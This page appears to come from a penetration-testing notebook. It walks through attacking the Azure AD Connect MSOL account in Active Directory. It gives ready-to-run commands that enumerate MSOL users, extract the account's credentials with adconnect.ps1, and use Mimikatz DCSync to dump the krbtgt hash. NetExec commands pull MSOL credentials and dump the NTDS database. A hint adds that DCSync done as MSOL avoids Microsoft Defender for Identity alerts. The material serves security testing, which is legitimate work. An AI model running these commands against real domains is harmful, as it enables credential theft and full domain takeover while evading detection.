# MSOL (Microsoft Online Services) account
{% embed url="" %}
## Brute force
{% embed url="" %}
{% content-ref url="../../brute-force/o365-bruteforce" %}
[o365-bruteforce](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/o365-bruteforce)
{% endcontent-ref %}
## Enumerate the PHS account and server where AD Connect is installed.
```powershell
# PowerView
Get-DomainUser -Identity "MSOL_*" -Domain domain.local
# AD module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server domain.local -Properties * | select SamAccountName,Description | fl
```
## Extract MSOL credentials
{% hint style="warning" %}
*Administrative privileges needed*
{% endhint %}
{% embed url="" %}
{% embed url="" %}
```powershell
.\adconnect.ps1
```
With the password
```powershell
runas /user:domain.local\MSOL_16fb75d0227d /netonly cmd
```
### DCSync
{% hint style="success" %}
*Because AD Connect synchronizes hashes every two minutes, in an Enterprise Environment, the MSOL\_ account will be excluded from tools like MDI. This will allow us to run DCSync without any alerts.* 🥳
{% endhint %}
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local"'
```
{% content-ref url="../../internal-pentest/dcsync" %}
[dcsync](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/dcsync)
{% endcontent-ref %}
## NXC
```
nxc ldap [IP] -u username -p password -M entra-id
```
Get MSOL Credentials
```
nxc smb 10.0.0.8 -u admin01 -p '<-SNIP->' --local-auth -M msol
```
MSOL account can perform a **DCSync** because the MSOL account has the **Replicate Directory Changes All** permissions
```yaml
nxc smb 10.0.0.4 -u MSOL_80541c18ebaa -p '<-SNIP->' --ntds
```
{% embed url="" %}